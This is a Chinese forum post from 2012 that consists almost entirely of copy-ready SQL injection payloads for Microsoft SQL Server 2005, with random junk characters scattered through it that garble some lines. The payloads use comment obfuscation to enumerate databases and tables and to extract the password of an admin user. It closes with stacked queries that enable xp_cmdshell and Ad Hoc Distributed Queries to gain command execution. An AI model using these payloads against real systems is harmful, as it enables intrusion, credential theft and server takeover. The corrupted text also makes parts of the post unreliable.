( A; D: c( S+ P- t
0 o$ g& }" t3 S* h' {. [& t4 X8 k& P$ g% x* P
[Copy to clipboard]CODE:
8 |- c4 E3 ^5 `( ~* R# m/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--% L6 Y/ W( g9 g X
) F# b4 }$ Q! h( G7 ~, p0 `0 W爆表语句,somedb部份是所要列的数据库,红色数字1累加' Z# E6 z* ?6 U [# }9 E/ g
) n/ f4 _& E& Q
8 ]5 }9 s( e/ e2 F2 o) A( w
[Copy to clipboard]CODE:0 j% o6 U" [# R& e% X. T& w
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
9 {6 Z6 Y; N6 D) `) z
D9 l. `/ W/ y. `' E) f6 Y6 b# c0 ^爆字段语句,爆表admin里user='icerover'的密码段 l8 W: A- n: Q
9 S5 D% j( c# h1 a w6 P0 @3 m) R. I! T0 O) E
[Copy to clipboard]CODE:
) a* z7 J# ~9 q' N7 E6 Q**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--( v9 \7 B/ K' ^3 b2 T1 A% J8 O) O
' g9 B8 d2 [9 Dmssql2005默认没有开xp_cmdshell的,openrowset也不能用8 P6 \* `8 `/ ^7 h5 m" L
如果是sa权限,可以这样来开启
/ x' w' R" Y1 h) h1 x/ R( A开启openrowset5 A9 y, Q3 S8 C) }. x: B+ m
. C; K+ s7 k3 r2 K1 C$ I
( R% {/ @4 J! e, V- v6 m2 A[Copy to clipboard]CODE:9 ~+ y% `2 ]' @5 x
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
' S# D$ z% a2 j: _4 Z/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
$ z( W# \+ V/ A8 }" C- c4 R3 |' F1 F9 k; z. h. T
开启xp_cmdshell" t+ f$ O- [% ?
! Z. L" S) `2 V* E& g7 `
! d0 g/ t0 U6 }+ v
[Copy to clipboard]CODE:
9 B( Z' M( T1 s$ VEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
, P9 y( _/ { i$ {5 k' bEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
' c9 f; C) ]5 L+ Q2 U1 u3 D0 G1 N
ok,over~~晚安
0 S4 D% {0 ]$ P% L4 U) O3 o4 Q |
发表于 2012-9-13 17:19:47
收藏
支持
反对